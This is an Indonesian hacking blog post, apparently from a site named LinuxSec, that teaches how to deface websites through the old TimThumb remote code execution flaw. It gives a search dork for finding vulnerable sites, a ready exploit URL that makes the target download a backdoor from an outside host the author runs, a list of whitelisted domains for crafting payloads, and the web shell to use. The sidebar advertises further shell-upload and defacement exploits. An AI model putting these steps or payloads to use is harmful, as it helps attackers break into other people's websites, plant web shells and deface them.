• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Deface dengan Metode Timthumb Remote Code Execution

April 25, 2018 by Jack Wilder 1 Comment

Deface dengan Metode Timthumb Remote Code Execution. Exploit ini sudah ada sejak lama. Mungkin 2010 an. Namun sampai sekarang masih banyak website yang vuln. Bisa dibilang old but gold.

Untuk exploitnya sendiri rata rata hanya bisa digunakan untuk timthumb versi 1.x. Jadi memang harus pandai pandai racik dork nya.

Dork: inurl:timthumb.php?src=

Silahkan dikembangkan.

Exploit: src=http://flickr.com.zafkiel.net/handler.php

Kalian boleh menggunakan web saya untuk get backdoornya. Atau jika punya web sendiri juga bisa.

Contoh website yang vuln:

 

Langsung saja ditempel exploitnya:

  • http://webtarget.com/timthumb.php?src=http://flickr.com.zafkiel.net/handler.php

Jika outputnya seperti ini berarti berhasil.

Tinggal diakses saja shell nya. Intuk path shellnya tertera di pesan error.

Jika masih bingung, berikut videonya:

Untuk membuat payload sendiri, subdomain yang dapat digunakan adalah berikut:

	'flickr.com',
	'picasa.com',
	'blogger.com',
	'wordpress.com',
	'img.youtube.com',
	'upload.wikimedia.org',
	'photobucket.com',

Sekedar informasi tambahan, di tutorial ini saya menggunakan shell Marijuana.

Filed Under: Tutorial Deface, Web Hacking

Reader Interactions

Comments

  1. Tukang Koment says

    July 30, 2019 at 3:51 am

    emang remote p iyhh??
    bkannya Remote File Inclusion yahh?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

WordPress Plugin CopySafe PDF Protection Shell Upload

Uptimerobot.com Custom Domain or Subdomain Takeover

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

Exploit WPStore Themes Upload Vulnerability

Cracking FTP Password using Hydra on BackBox Linux

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

LinuxSec / 13 queries in 0.10 seconds